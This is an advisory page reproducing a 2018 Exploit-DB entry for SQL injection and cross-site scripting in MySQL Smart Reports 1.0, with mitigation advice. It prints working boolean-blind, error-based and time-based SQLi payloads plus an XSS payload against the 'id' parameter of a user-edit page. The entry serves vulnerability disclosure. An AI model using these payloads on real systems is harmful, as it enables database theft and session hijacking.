MySQL Smart Reports 1.0 - SQL Injection / Cross-Site Scripting

vendor:

MySQL Smart Reports

by:

Özkan Mustafa Akkus (AkkuS)

5.5

CVSS

MEDIUM

SQL Injection / Cross-Site Scripting

CWE

Product Name: MySQL Smart Reports

Affected Version From: 1

Affected Version To: 1

Patch Exists: NO

Related CWE:

CPE: mysql_smart_reports

Metasploit:

Other Scripts:

Platforms Tested: Kali linux

2018

MySQL Smart Reports 1.0 – SQL Injection / Cross-Site Scripting

It is a vulnerability in MySQL Smart Reports 1.0 that allows for SQL Injection and Cross-Site Scripting attacks. An attacker can exploit the 'id' parameter to inject malicious SQL queries or script code.

Mitigation:

To mitigate this vulnerability, sanitize and validate user input before using it in SQL queries or displaying it in web pages. Use prepared statements or parameterized queries to prevent SQL Injection. Implement input validation and output encoding to prevent Cross-Site Scripting.

Source

Exploit-DB raw data:

# Exploit Title: MySQL Smart Reports 1.0 - SQL Injection / Cross-Site Scripting
# Dork: N/A
# Date: 22.05.2018
# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
# Vendor Homepage: https://codecanyon.net/item/mysql-smart-reports-online-report-generator-with-existing-data/16836503
# Version: 1.0
# Category: Webapps
# Tested on: Kali linux
# Description : It is actually a post request sent by the user to update.
                You do not need to use post data. You can injection like
GET method.
====================================================

# PoC : SQLi :

Parameter : id

     Type : boolean-based blind
     Demo :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1
  Payload : add=true&id=9' RLIKE (SELECT (CASE WHEN (8956=8956) THEN 9 ELSE
0x28 END))-- YVFC

     Type : error-based
     Demo :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1
  Payload : add=true&id=9' AND (SELECT 3635 FROM(SELECT
COUNT(*),CONCAT(0x716a6a7671,(SELECT
(ELT(3635=3635,1))),0x7176627a71,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HEMo

     Type : AND/OR time-based blind
     Demo :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id=1
  Payload : add=true&id=9' AND SLEEP(5)-- mcFO


====================================================
# PoC : XSS :

  Payload :
http://test.com/MySQLSmartReports/system-settings-user-edit2.php?add=true&id='
</script><script>alert(1)</script>‘;